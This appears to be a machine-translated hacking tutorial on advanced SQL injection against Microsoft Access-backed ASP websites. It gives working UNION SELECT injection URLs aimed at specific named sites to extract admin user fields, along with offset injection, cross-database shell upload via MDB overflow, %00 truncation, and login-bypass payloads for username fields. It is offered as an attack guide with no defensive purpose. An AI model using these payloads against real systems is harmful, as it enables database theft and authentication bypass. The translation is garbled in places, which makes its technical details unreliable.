Experience on Advanced Access gameplay

1. Access Cross-database query.

Http://www.bkjia.com/news/type. asp? Type? Id = 1 and 1 = 2 union select 1, 2, user, 4, 5, 6 from [C: \ root \ data \ % 23db1. asp]. admin

Condition:The substation has been injected. You can use this method to query the route of the other station.

[C: \ root \ data \ % 23db1. asp] isDatabase

AdminFor tables in the database

UserIt is the segment of the admin table in the database.

The NBSI tool can be used intelligently.

2. Use XSS

I do not only have injection points and do not know tables.

Http://www.51qljr.com/xinxi/shownews.asp? Id = (575) And (1) = (2) UNION % 0 DSELECT % 0D1, chr (116) % 2 bchr (101) % 2 bchr (115) % 2 bchr (116), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 & id = 18% 0 Dfrom % 0 DMSysAccessObjects

Test'sChrCode ~~~~~

MSysAccessObjectsFor system tables

Our code is cross-administrator. Haha ~

3. Access offset Injection

To put it simplyOffset injection Principle:

1. Union merge query requires the same columns in the same order;

2. select * from admin as a inner join admin as B on. id = B. in this example, the admin table is recorded as a and B.

The query condition is that the id column of Table a is equal to the id column of Table B, and all equal rows are returned. Obviously, both a and B are in the same table, of course all are returned. Check the syntax if you do not understand it.

3. * indicates all fields. For example, if you check the admin table and there are several fields, * Indicates several fields.

For example, if admin has five columns, then union select 1, 2, 3, * from admin returns normally, it indicates that the injected table has eight columns (5 + 3 = 8)

Look at 90sec haxsscker's article: http://www.bkjia.com/Article/201212/179284.html

Example 2: red/Black Alliance

3. Access Overflow

To sum up, MDB overflow + cross-database Shell methods are requiredCondition:

1. You must have an absolute website path.

2. You must have an upload point in any format. (even if it is not an MDB suffix, cross-database connection is sufficient if the format is correct)

3. Of course, there must be injection points (or you can execute SQL statements in the background)

Some Thoughts on ACCESS Cross-database overflow MDB database overflow (what else is Union query described in cross-database query .)

Microsoft Data Access Component Data Source Name Buffer Overflow Vulnerability

4. Other Ideas

1) ACCESS advanced injection and exploitation skills (execute commands, etc)

2) Access injection and export file (injection and export file, with IIS interpretation vulnerability)

Appendix: lake2: http://www.bkjia.com/Article/201104/87439.html

3) usage of Access from basic to advanced (this article is very general)

4)% 00AccessTruncation character(Do you know ?)

5) an amazing injection:

Username input:

'Union SELECT, 1 FROM admin (table) WHERE ''= '//, 1 indicates the number of fields. Please try it blindly ....

Password Input: 1

Or enter the User Name:

Union select, 1 AS pwd (password field) FROM admin (table) WHERE ''='

// Set the number of columns to 1, for example, in the admin table; we set the two unknown and pwd columns to 1, then the program vulnerability code if pwd = rs ("pwd") then... (1 = 1. We can control the Password Input .)

Password Input: 1

This is a successful bypass!

'Is closed.

You can also: 'Union SELECT, 1 FROM admin % 00 // Truncation

You can also: union select, 1 AS pwd % 00 // truncation does not require table segments. select forces to insert two columns without names and use the as keyword to alias pwd !!!